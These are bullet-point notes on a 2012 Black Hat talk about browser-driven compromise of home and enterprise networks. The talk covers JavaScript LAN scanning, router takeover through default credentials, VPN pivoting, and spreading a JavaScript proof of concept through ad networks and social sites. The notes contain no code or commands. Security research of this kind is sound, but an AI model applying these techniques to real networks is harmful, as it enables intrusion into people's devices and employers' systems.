=======================================
A Plan for Permanent Network Compromise
=======================================

:Date:
    2012-07-28

:Speakers:
    Phil Purviance, Josh Brashars

:Slides:
    http://media.blackhat.com/bh-us-12/Briefings/Purviance/BH_US_12_Purviance_Blended_Threats_Slides.pdf

Browser-Based Attacks
=====================

Old Skool
---------

+ Exploit Windows
+ Exfiltrate data
+ Detected/removed by AV

Nu Skool
--------

+ aka "Blended threats"
+ multiple vectors (worm gets email, back-door for infection)
+ Break free of the browser and into the network


Why Attack Network Devices?
===========================

+ Hard to detect w/ AV
+ Non-standard upgrade model
+ Ignored by users if service keeps running

Compromising Network Devices
============================

+ Rogue SOHO/wifi routers (!!)

  - More common than you think
  - Engineers, careless QA plugging into Enterprise
  - Default settings!!

+ Bridging enterprise via VPN from compromised home users (!!)
+ Worst case scenario:

  - Make browser do as much as possible
  - Make end-user do all the work

+ Proof-of-concept: 1 JavaScript program

  - Hijack ad networks, upload sites, online surveys
  - Social network sites
  - Exploiting non-technical friends/family with spam posts

Network Scanning w/ JS
======================

+ JSScan
+ JS-Recon
+ jslanscanner
+ Enumerate IP addreses/ports with dynamic element creation (to load an image)
  - code makes a request on the LAN to see if reachable
+ WebSockets
+ Pwning SOHO/home routers w/ default credentials
+ HTTP Basic Authentication